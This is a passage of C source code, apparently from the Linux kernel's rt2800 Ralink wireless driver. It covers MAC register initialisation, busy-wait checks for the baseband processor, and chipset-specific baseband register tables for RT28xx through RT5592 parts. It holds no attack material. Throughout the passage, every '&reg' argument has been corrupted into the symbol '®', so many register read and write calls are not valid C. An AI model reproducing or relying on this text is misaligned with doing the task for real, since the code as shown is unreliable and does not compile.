rt2x00_set_field32(®, TX_RTS_CFG_RTS_FBK_EN, 0);
rt2800_register_write(rt2x00dev, TX_RTS_CFG, reg);
rt2800_register_write(rt2x00dev, EXP_ACK_TIME, 0x002400ca);
/*
* Usually the CCK SIFS time should be set to 10 and the OFDM SIFS
* time should be set to 16. However, the original Ralink driver uses
* 16 for both and indeed using a value of 10 for CCK SIFS results in
* connection problems with 11g + CTS protection. Hence, use the same
* defaults as the Ralink driver: 16 for both, CCK and OFDM SIFS.
*/
rt2800_register_read(rt2x00dev, XIFS_TIME_CFG, ®);
rt2x00_set_field32(®, XIFS_TIME_CFG_CCKM_SIFS_TIME, 16);
rt2x00_set_field32(®, XIFS_TIME_CFG_OFDM_SIFS_TIME, 16);
rt2x00_set_field32(®, XIFS_TIME_CFG_OFDM_XIFS_TIME, 4);
rt2x00_set_field32(®, XIFS_TIME_CFG_EIFS, 314);
rt2x00_set_field32(®, XIFS_TIME_CFG_BB_RXEND_ENABLE, 1);
rt2800_register_write(rt2x00dev, XIFS_TIME_CFG, reg);
rt2800_register_write(rt2x00dev, PWR_PIN_CFG, 0x00000003);
/*
* ASIC will keep garbage value after boot, clear encryption keys.
*/
for (i = 0; i < 4; i++)
rt2800_register_write(rt2x00dev,
SHARED_KEY_MODE_ENTRY(i), 0);
for (i = 0; i < 256; i++) {
rt2800_config_wcid(rt2x00dev, NULL, i);
rt2800_delete_wcid_attr(rt2x00dev, i);
rt2800_register_write(rt2x00dev, MAC_IVEIV_ENTRY(i), 0);
}
/*
* Clear all beacons
*/
for (i = 0; i < 8; i++)
rt2800_clear_beacon_register(rt2x00dev, i);
if (rt2x00_is_usb(rt2x00dev)) {
rt2800_register_read(rt2x00dev, US_CYC_CNT, ®);
rt2x00_set_field32(®, US_CYC_CNT_CLOCK_CYCLE, 30);
rt2800_register_write(rt2x00dev, US_CYC_CNT, reg);
} else if (rt2x00_is_pcie(rt2x00dev)) {
rt2800_register_read(rt2x00dev, US_CYC_CNT, ®);
rt2x00_set_field32(®, US_CYC_CNT_CLOCK_CYCLE, 125);
rt2800_register_write(rt2x00dev, US_CYC_CNT, reg);
}
rt2800_register_read(rt2x00dev, HT_FBK_CFG0, ®);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS0FBK, 0);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS1FBK, 0);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS2FBK, 1);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS3FBK, 2);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS4FBK, 3);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS5FBK, 4);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS6FBK, 5);
rt2x00_set_field32(®, HT_FBK_CFG0_HTMCS7FBK, 6);
rt2800_register_write(rt2x00dev, HT_FBK_CFG0, reg);
rt2800_register_read(rt2x00dev, HT_FBK_CFG1, ®);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS8FBK, 8);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS9FBK, 8);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS10FBK, 9);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS11FBK, 10);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS12FBK, 11);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS13FBK, 12);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS14FBK, 13);
rt2x00_set_field32(®, HT_FBK_CFG1_HTMCS15FBK, 14);
rt2800_register_write(rt2x00dev, HT_FBK_CFG1, reg);
rt2800_register_read(rt2x00dev, LG_FBK_CFG0, ®);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS0FBK, 8);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS1FBK, 8);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS2FBK, 9);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS3FBK, 10);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS4FBK, 11);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS5FBK, 12);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS6FBK, 13);
rt2x00_set_field32(®, LG_FBK_CFG0_OFDMMCS7FBK, 14);
rt2800_register_write(rt2x00dev, LG_FBK_CFG0, reg);
rt2800_register_read(rt2x00dev, LG_FBK_CFG1, ®);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS0FBK, 0);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS1FBK, 0);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS2FBK, 1);
rt2x00_set_field32(®, LG_FBK_CFG0_CCKMCS3FBK, 2);
rt2800_register_write(rt2x00dev, LG_FBK_CFG1, reg);
/*
* Do not force the BA window size, we use the TXWI to set it
*/
rt2800_register_read(rt2x00dev, AMPDU_BA_WINSIZE, ®);
rt2x00_set_field32(®, AMPDU_BA_WINSIZE_FORCE_WINSIZE_ENABLE, 0);
rt2x00_set_field32(®, AMPDU_BA_WINSIZE_FORCE_WINSIZE, 0);
rt2800_register_write(rt2x00dev, AMPDU_BA_WINSIZE, reg);
/*
* We must clear the error counters.
* These registers are cleared on read,
* so we may pass a useless variable to store the value.
*/
rt2800_register_read(rt2x00dev, RX_STA_CNT0, ®);
rt2800_register_read(rt2x00dev, RX_STA_CNT1, ®);
rt2800_register_read(rt2x00dev, RX_STA_CNT2, ®);
rt2800_register_read(rt2x00dev, TX_STA_CNT0, ®);
rt2800_register_read(rt2x00dev, TX_STA_CNT1, ®);
rt2800_register_read(rt2x00dev, TX_STA_CNT2, ®);
/*
* Setup leadtime for pre tbtt interrupt to 6ms
*/
rt2800_register_read(rt2x00dev, INT_TIMER_CFG, ®);
rt2x00_set_field32(®, INT_TIMER_CFG_PRE_TBTT_TIMER, 6 << 4);
rt2800_register_write(rt2x00dev, INT_TIMER_CFG, reg);
/*
* Set up channel statistics timer
*/
rt2800_register_read(rt2x00dev, CH_TIME_CFG, ®);
rt2x00_set_field32(®, CH_TIME_CFG_EIFS_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_NAV_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_RX_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_TX_BUSY, 1);
rt2x00_set_field32(®, CH_TIME_CFG_TMR_EN, 1);
rt2800_register_write(rt2x00dev, CH_TIME_CFG, reg);
return 0;
}
static int rt2800_wait_bbp_rf_ready(struct rt2x00_dev *rt2x00dev)
{
unsigned int i;
u32 reg;
for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
rt2800_register_read(rt2x00dev, MAC_STATUS_CFG, ®);
if (!rt2x00_get_field32(reg, MAC_STATUS_CFG_BBP_RF_BUSY))
return 0;
udelay(REGISTER_BUSY_DELAY);
}
rt2x00_err(rt2x00dev, "BBP/RF register access failed, aborting\n");
return -EACCES;
}
static int rt2800_wait_bbp_ready(struct rt2x00_dev *rt2x00dev)
{
unsigned int i;
u8 value;
/*
* BBP was enabled after firmware was loaded,
* but we need to reactivate it now.
*/
rt2800_register_write(rt2x00dev, H2M_BBP_AGENT, 0);
rt2800_register_write(rt2x00dev, H2M_MAILBOX_CSR, 0);
msleep(1);
for (i = 0; i < REGISTER_BUSY_COUNT; i++) {
rt2800_bbp_read(rt2x00dev, 0, &value);
if ((value != 0xff) && (value != 0x00))
return 0;
udelay(REGISTER_BUSY_DELAY);
}
rt2x00_err(rt2x00dev, "BBP register access failed, aborting\n");
return -EACCES;
}
static void rt2800_bbp4_mac_if_ctrl(struct rt2x00_dev *rt2x00dev)
{
u8 value;
rt2800_bbp_read(rt2x00dev, 4, &value);
rt2x00_set_field8(&value, BBP4_MAC_IF_CTRL, 1);
rt2800_bbp_write(rt2x00dev, 4, value);
}
static void rt2800_init_freq_calibration(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 142, 1);
rt2800_bbp_write(rt2x00dev, 143, 57);
}
static void rt2800_init_bbp_5592_glrt(struct rt2x00_dev *rt2x00dev)
{
const u8 glrt_table[] = {
0xE0, 0x1F, 0X38, 0x32, 0x08, 0x28, 0x19, 0x0A, 0xFF, 0x00, /* 128 ~ 137 */
0x16, 0x10, 0x10, 0x0B, 0x36, 0x2C, 0x26, 0x24, 0x42, 0x36, /* 138 ~ 147 */
0x30, 0x2D, 0x4C, 0x46, 0x3D, 0x40, 0x3E, 0x42, 0x3D, 0x40, /* 148 ~ 157 */
0X3C, 0x34, 0x2C, 0x2F, 0x3C, 0x35, 0x2E, 0x2A, 0x49, 0x41, /* 158 ~ 167 */
0x36, 0x31, 0x30, 0x30, 0x0E, 0x0D, 0x28, 0x21, 0x1C, 0x16, /* 168 ~ 177 */
0x50, 0x4A, 0x43, 0x40, 0x10, 0x10, 0x10, 0x10, 0x00, 0x00, /* 178 ~ 187 */
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 188 ~ 197 */
0x00, 0x00, 0x7D, 0x14, 0x32, 0x2C, 0x36, 0x4C, 0x43, 0x2C, /* 198 ~ 207 */
0x2E, 0x36, 0x30, 0x6E, /* 208 ~ 211 */
};
int i;
for (i = 0; i < ARRAY_SIZE(glrt_table); i++) {
rt2800_bbp_write(rt2x00dev, 195, 128 + i);
rt2800_bbp_write(rt2x00dev, 196, glrt_table[i]);
}
};
static void rt2800_init_bbp_early(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 65, 0x2C);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 68, 0x0B);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 73, 0x10);
rt2800_bbp_write(rt2x00dev, 81, 0x37);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6A);
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x00);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x00);
rt2800_bbp_write(rt2x00dev, 103, 0x00);
rt2800_bbp_write(rt2x00dev, 105, 0x05);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
}
static void rt2800_disable_unused_dac_adc(struct rt2x00_dev *rt2x00dev)
{
u16 eeprom;
u8 value;
rt2800_bbp_read(rt2x00dev, 138, &value);
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF0, &eeprom);
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_TXPATH) == 1)
value |= 0x20;
if (rt2x00_get_field16(eeprom, EEPROM_NIC_CONF0_RXPATH) == 1)
value &= ~0x02;
rt2800_bbp_write(rt2x00dev, 138, value);
}
static void rt2800_init_bbp_305x_soc(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 31, 0x08);
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x10);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 78, 0x0e);
rt2800_bbp_write(rt2x00dev, 80, 0x08);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6a);
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x00);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x00);
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
rt2800_bbp_write(rt2x00dev, 105, 0x01);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
}
static void rt2800_init_bbp_28xx(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860C)) {
rt2800_bbp_write(rt2x00dev, 69, 0x16);
rt2800_bbp_write(rt2x00dev, 73, 0x12);
} else {
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x10);
}
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 81, 0x37);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6a);
if (rt2x00_rt_rev(rt2x00dev, RT2860, REV_RT2860D))
rt2800_bbp_write(rt2x00dev, 84, 0x19);
else
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x00);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x00);
rt2800_bbp_write(rt2x00dev, 103, 0x00);
rt2800_bbp_write(rt2x00dev, 105, 0x05);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
}
static void rt2800_init_bbp_30xx(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x10);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 79, 0x13);
rt2800_bbp_write(rt2x00dev, 80, 0x05);
rt2800_bbp_write(rt2x00dev, 81, 0x33);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6a);
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x00);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x00);
if (rt2x00_rt_rev_gte(rt2x00dev, RT3070, REV_RT3070F) ||
rt2x00_rt_rev_gte(rt2x00dev, RT3071, REV_RT3071E) ||
rt2x00_rt_rev_gte(rt2x00dev, RT3090, REV_RT3090E))
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
else
rt2800_bbp_write(rt2x00dev, 103, 0x00);
rt2800_bbp_write(rt2x00dev, 105, 0x05);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
if (rt2x00_rt(rt2x00dev, RT3071) ||
rt2x00_rt(rt2x00dev, RT3090))
rt2800_disable_unused_dac_adc(rt2x00dev);
}
static void rt2800_init_bbp_3290(struct rt2x00_dev *rt2x00dev)
{
u8 value;
rt2800_bbp4_mac_if_ctrl(rt2x00dev);
rt2800_bbp_write(rt2x00dev, 31, 0x08);
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 68, 0x0b);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x13);
rt2800_bbp_write(rt2x00dev, 75, 0x46);
rt2800_bbp_write(rt2x00dev, 76, 0x28);
rt2800_bbp_write(rt2x00dev, 77, 0x58);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 74, 0x0b);
rt2800_bbp_write(rt2x00dev, 79, 0x18);
rt2800_bbp_write(rt2x00dev, 80, 0x09);
rt2800_bbp_write(rt2x00dev, 81, 0x33);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x7a);
rt2800_bbp_write(rt2x00dev, 84, 0x9a);
rt2800_bbp_write(rt2x00dev, 86, 0x38);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x02);
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
rt2800_bbp_write(rt2x00dev, 104, 0x92);
rt2800_bbp_write(rt2x00dev, 105, 0x1c);
rt2800_bbp_write(rt2x00dev, 106, 0x03);
rt2800_bbp_write(rt2x00dev, 128, 0x12);
rt2800_bbp_write(rt2x00dev, 67, 0x24);
rt2800_bbp_write(rt2x00dev, 143, 0x04);
rt2800_bbp_write(rt2x00dev, 142, 0x99);
rt2800_bbp_write(rt2x00dev, 150, 0x30);
rt2800_bbp_write(rt2x00dev, 151, 0x2e);
rt2800_bbp_write(rt2x00dev, 152, 0x20);
rt2800_bbp_write(rt2x00dev, 153, 0x34);
rt2800_bbp_write(rt2x00dev, 154, 0x40);
rt2800_bbp_write(rt2x00dev, 155, 0x3b);
rt2800_bbp_write(rt2x00dev, 253, 0x04);
rt2800_bbp_read(rt2x00dev, 47, &value);
rt2x00_set_field8(&value, BBP47_TSSI_ADC6, 1);
rt2800_bbp_write(rt2x00dev, 47, value);
/* Use 5-bit ADC for Acquisition and 8-bit ADC for data */
rt2800_bbp_read(rt2x00dev, 3, &value);
rt2x00_set_field8(&value, BBP3_ADC_MODE_SWITCH, 1);
rt2x00_set_field8(&value, BBP3_ADC_INIT_MODE, 1);
rt2800_bbp_write(rt2x00dev, 3, value);
}
static void rt2800_init_bbp_3352(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 3, 0x00);
rt2800_bbp_write(rt2x00dev, 4, 0x50);
rt2800_bbp_write(rt2x00dev, 31, 0x08);
rt2800_bbp_write(rt2x00dev, 47, 0x48);
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 68, 0x0b);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x13);
rt2800_bbp_write(rt2x00dev, 75, 0x46);
rt2800_bbp_write(rt2x00dev, 76, 0x28);
rt2800_bbp_write(rt2x00dev, 77, 0x59);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 78, 0x0e);
rt2800_bbp_write(rt2x00dev, 80, 0x08);
rt2800_bbp_write(rt2x00dev, 81, 0x37);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6a);
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x38);
rt2800_bbp_write(rt2x00dev, 88, 0x90);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x02);
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
rt2800_bbp_write(rt2x00dev, 104, 0x92);
rt2800_bbp_write(rt2x00dev, 105, 0x34);
rt2800_bbp_write(rt2x00dev, 106, 0x05);
rt2800_bbp_write(rt2x00dev, 120, 0x50);
rt2800_bbp_write(rt2x00dev, 137, 0x0f);
rt2800_bbp_write(rt2x00dev, 163, 0xbd);
/* Set ITxBF timeout to 0x9c40=1000msec */
rt2800_bbp_write(rt2x00dev, 179, 0x02);
rt2800_bbp_write(rt2x00dev, 180, 0x00);
rt2800_bbp_write(rt2x00dev, 182, 0x40);
rt2800_bbp_write(rt2x00dev, 180, 0x01);
rt2800_bbp_write(rt2x00dev, 182, 0x9c);
rt2800_bbp_write(rt2x00dev, 179, 0x00);
/* Reprogram the inband interface to put right values in RXWI */
rt2800_bbp_write(rt2x00dev, 142, 0x04);
rt2800_bbp_write(rt2x00dev, 143, 0x3b);
rt2800_bbp_write(rt2x00dev, 142, 0x06);
rt2800_bbp_write(rt2x00dev, 143, 0xa0);
rt2800_bbp_write(rt2x00dev, 142, 0x07);
rt2800_bbp_write(rt2x00dev, 143, 0xa1);
rt2800_bbp_write(rt2x00dev, 142, 0x08);
rt2800_bbp_write(rt2x00dev, 143, 0xa2);
rt2800_bbp_write(rt2x00dev, 148, 0xc8);
}
static void rt2800_init_bbp_3390(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x10);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 79, 0x13);
rt2800_bbp_write(rt2x00dev, 80, 0x05);
rt2800_bbp_write(rt2x00dev, 81, 0x33);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6a);
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x00);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x00);
if (rt2x00_rt_rev_gte(rt2x00dev, RT3390, REV_RT3390E))
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
else
rt2800_bbp_write(rt2x00dev, 103, 0x00);
rt2800_bbp_write(rt2x00dev, 105, 0x05);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
rt2800_disable_unused_dac_adc(rt2x00dev);
}
static void rt2800_init_bbp_3572(struct rt2x00_dev *rt2x00dev)
{
rt2800_bbp_write(rt2x00dev, 31, 0x08);
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x10);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 79, 0x13);
rt2800_bbp_write(rt2x00dev, 80, 0x05);
rt2800_bbp_write(rt2x00dev, 81, 0x33);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x6a);
rt2800_bbp_write(rt2x00dev, 84, 0x99);
rt2800_bbp_write(rt2x00dev, 86, 0x00);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x00);
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
rt2800_bbp_write(rt2x00dev, 105, 0x05);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
rt2800_disable_unused_dac_adc(rt2x00dev);
}
static void rt2800_init_bbp_3593(struct rt2x00_dev *rt2x00dev)
{
rt2800_init_bbp_early(rt2x00dev);
rt2800_bbp_write(rt2x00dev, 79, 0x13);
rt2800_bbp_write(rt2x00dev, 80, 0x05);
rt2800_bbp_write(rt2x00dev, 81, 0x33);
rt2800_bbp_write(rt2x00dev, 137, 0x0f);
rt2800_bbp_write(rt2x00dev, 84, 0x19);
/* Enable DC filter */
if (rt2x00_rt_rev_gte(rt2x00dev, RT3593, REV_RT3593E))
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
}
static void rt2800_init_bbp_53xx(struct rt2x00_dev *rt2x00dev)
{
int ant, div_mode;
u16 eeprom;
u8 value;
rt2800_bbp4_mac_if_ctrl(rt2x00dev);
rt2800_bbp_write(rt2x00dev, 31, 0x08);
rt2800_bbp_write(rt2x00dev, 65, 0x2c);
rt2800_bbp_write(rt2x00dev, 66, 0x38);
rt2800_bbp_write(rt2x00dev, 68, 0x0b);
rt2800_bbp_write(rt2x00dev, 69, 0x12);
rt2800_bbp_write(rt2x00dev, 73, 0x13);
rt2800_bbp_write(rt2x00dev, 75, 0x46);
rt2800_bbp_write(rt2x00dev, 76, 0x28);
rt2800_bbp_write(rt2x00dev, 77, 0x59);
rt2800_bbp_write(rt2x00dev, 70, 0x0a);
rt2800_bbp_write(rt2x00dev, 79, 0x13);
rt2800_bbp_write(rt2x00dev, 80, 0x05);
rt2800_bbp_write(rt2x00dev, 81, 0x33);
rt2800_bbp_write(rt2x00dev, 82, 0x62);
rt2800_bbp_write(rt2x00dev, 83, 0x7a);
rt2800_bbp_write(rt2x00dev, 84, 0x9a);
rt2800_bbp_write(rt2x00dev, 86, 0x38);
if (rt2x00_rt(rt2x00dev, RT5392))
rt2800_bbp_write(rt2x00dev, 88, 0x90);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x02);
if (rt2x00_rt(rt2x00dev, RT5392)) {
rt2800_bbp_write(rt2x00dev, 95, 0x9a);
rt2800_bbp_write(rt2x00dev, 98, 0x12);
}
rt2800_bbp_write(rt2x00dev, 103, 0xc0);
rt2800_bbp_write(rt2x00dev, 104, 0x92);
rt2800_bbp_write(rt2x00dev, 105, 0x3c);
if (rt2x00_rt(rt2x00dev, RT5390))
rt2800_bbp_write(rt2x00dev, 106, 0x03);
else if (rt2x00_rt(rt2x00dev, RT5392))
rt2800_bbp_write(rt2x00dev, 106, 0x12);
else
WARN_ON(1);
rt2800_bbp_write(rt2x00dev, 128, 0x12);
if (rt2x00_rt(rt2x00dev, RT5392)) {
rt2800_bbp_write(rt2x00dev, 134, 0xd0);
rt2800_bbp_write(rt2x00dev, 135, 0xf6);
}
rt2800_disable_unused_dac_adc(rt2x00dev);
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);
div_mode = rt2x00_get_field16(eeprom,
EEPROM_NIC_CONF1_ANT_DIVERSITY);
ant = (div_mode == 3) ? 1 : 0;
/* check if this is a Bluetooth combo card */
if (rt2x00_has_cap_bt_coexist(rt2x00dev)) {
u32 reg;
rt2800_register_read(rt2x00dev, GPIO_CTRL, ®);
rt2x00_set_field32(®, GPIO_CTRL_DIR3, 0);
rt2x00_set_field32(®, GPIO_CTRL_DIR6, 0);
rt2x00_set_field32(®, GPIO_CTRL_VAL3, 0);
rt2x00_set_field32(®, GPIO_CTRL_VAL6, 0);
if (ant == 0)
rt2x00_set_field32(®, GPIO_CTRL_VAL3, 1);
else if (ant == 1)
rt2x00_set_field32(®, GPIO_CTRL_VAL6, 1);
rt2800_register_write(rt2x00dev, GPIO_CTRL, reg);
}
/* This chip has hardware antenna diversity*/
if (rt2x00_rt_rev_gte(rt2x00dev, RT5390, REV_RT5390R)) {
rt2800_bbp_write(rt2x00dev, 150, 0); /* Disable Antenna Software OFDM */
rt2800_bbp_write(rt2x00dev, 151, 0); /* Disable Antenna Software CCK */
rt2800_bbp_write(rt2x00dev, 154, 0); /* Clear previously selected antenna */
}
rt2800_bbp_read(rt2x00dev, 152, &value);
if (ant == 0)
rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 1);
else
rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 0);
rt2800_bbp_write(rt2x00dev, 152, value);
rt2800_init_freq_calibration(rt2x00dev);
}
static void rt2800_init_bbp_5592(struct rt2x00_dev *rt2x00dev)
{
int ant, div_mode;
u16 eeprom;
u8 value;
rt2800_init_bbp_early(rt2x00dev);
rt2800_bbp_read(rt2x00dev, 105, &value);
rt2x00_set_field8(&value, BBP105_MLD,
rt2x00dev->default_ant.rx_chain_num == 2);
rt2800_bbp_write(rt2x00dev, 105, value);
rt2800_bbp4_mac_if_ctrl(rt2x00dev);
rt2800_bbp_write(rt2x00dev, 20, 0x06);
rt2800_bbp_write(rt2x00dev, 31, 0x08);
rt2800_bbp_write(rt2x00dev, 65, 0x2C);
rt2800_bbp_write(rt2x00dev, 68, 0xDD);
rt2800_bbp_write(rt2x00dev, 69, 0x1A);
rt2800_bbp_write(rt2x00dev, 70, 0x05);
rt2800_bbp_write(rt2x00dev, 73, 0x13);
rt2800_bbp_write(rt2x00dev, 74, 0x0F);
rt2800_bbp_write(rt2x00dev, 75, 0x4F);
rt2800_bbp_write(rt2x00dev, 76, 0x28);
rt2800_bbp_write(rt2x00dev, 77, 0x59);
rt2800_bbp_write(rt2x00dev, 84, 0x9A);
rt2800_bbp_write(rt2x00dev, 86, 0x38);
rt2800_bbp_write(rt2x00dev, 88, 0x90);
rt2800_bbp_write(rt2x00dev, 91, 0x04);
rt2800_bbp_write(rt2x00dev, 92, 0x02);
rt2800_bbp_write(rt2x00dev, 95, 0x9a);
rt2800_bbp_write(rt2x00dev, 98, 0x12);
rt2800_bbp_write(rt2x00dev, 103, 0xC0);
rt2800_bbp_write(rt2x00dev, 104, 0x92);
/* FIXME BBP105 owerwrite */
rt2800_bbp_write(rt2x00dev, 105, 0x3C);
rt2800_bbp_write(rt2x00dev, 106, 0x35);
rt2800_bbp_write(rt2x00dev, 128, 0x12);
rt2800_bbp_write(rt2x00dev, 134, 0xD0);
rt2800_bbp_write(rt2x00dev, 135, 0xF6);
rt2800_bbp_write(rt2x00dev, 137, 0x0F);
/* Initialize GLRT (Generalized Likehood Radio Test) */
rt2800_init_bbp_5592_glrt(rt2x00dev);
rt2800_bbp4_mac_if_ctrl(rt2x00dev);
rt2800_eeprom_read(rt2x00dev, EEPROM_NIC_CONF1, &eeprom);
div_mode = rt2x00_get_field16(eeprom, EEPROM_NIC_CONF1_ANT_DIVERSITY);
ant = (div_mode == 3) ? 1 : 0;
rt2800_bbp_read(rt2x00dev, 152, &value);
if (ant == 0) {
/* Main antenna */
rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 1);
} else {
/* Auxiliary antenna */
rt2x00_set_field8(&value, BBP152_RX_DEFAULT_ANT, 0);
}
rt2800_bbp_write(rt2x00dev, 152, value);
if (rt2x00_rt_rev_gte(rt2x00dev, RT5592, REV_RT5592C)) {
rt2800_bbp_read(rt2x00dev, 254, &value);
rt2x00_set_field8(&value, BBP254_BIT7, 1);
rt2800_bbp_write(rt2x00dev, 254, value);
}
rt2800_init_freq_calibration(rt2x00dev);
